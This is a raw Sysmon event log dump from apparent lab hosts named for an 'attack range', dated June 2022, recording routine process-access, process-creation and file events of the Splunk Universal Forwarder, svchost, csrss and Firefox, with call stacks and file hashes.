14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044493Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044492Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-1884-629A-2307-000000006002}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044491Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.373{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1884-629A-2307-000000006002}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044490Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.375{0A5DF930-1884-629A-2307-000000006002}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044489Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.123{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96944FA6887202E5930F030A0490D3E0,SHA256=23E4F2551C8F83D24F025F602B5C0374F62B6589DF261194E399EAB7334A577F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:49.536{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=E9195EF15709B383A7D4CA0926FC9F8A,SHA256=C656E6BCF659D3A15F3489E8FF8AC77E91860E427CDA8F95F3E70004A3206FDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:49.336{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21DA9A6FA82C632EB982C41BF12371A9,SHA256=95B21E95CA44D1725232E4D1B275C9CDA8CC577161B9B0A20B8ABE443469B627,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044517Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:49.358{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0EE722278340CD6EA990C62D12C0E09,SHA256=12989062D753A976AC25051BC7522F24A8E45C1F6D41346A7A139783DCE11FB3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044516Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1884-629A-2407-000000006002}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044515Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044514Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044513Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044512Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044511Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044510Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044509Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044508Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1884-629A-2407-000000006002}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044507Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044506Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044505Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.998{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1884-629A-2407-000000006002}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044504Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:48.999{0A5DF930-1884-629A-2407-000000006002}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:50.368{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFC9A24A3BF1B0B526396EECFB792415,SHA256=C8A54983E4C627C966EC5ABD487A045814123B93B9C8F5F7C4891FB47BC8F38B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044547Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1886-629A-2607-000000006002}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044546Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044545Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044544Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044543Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044542Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044541Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 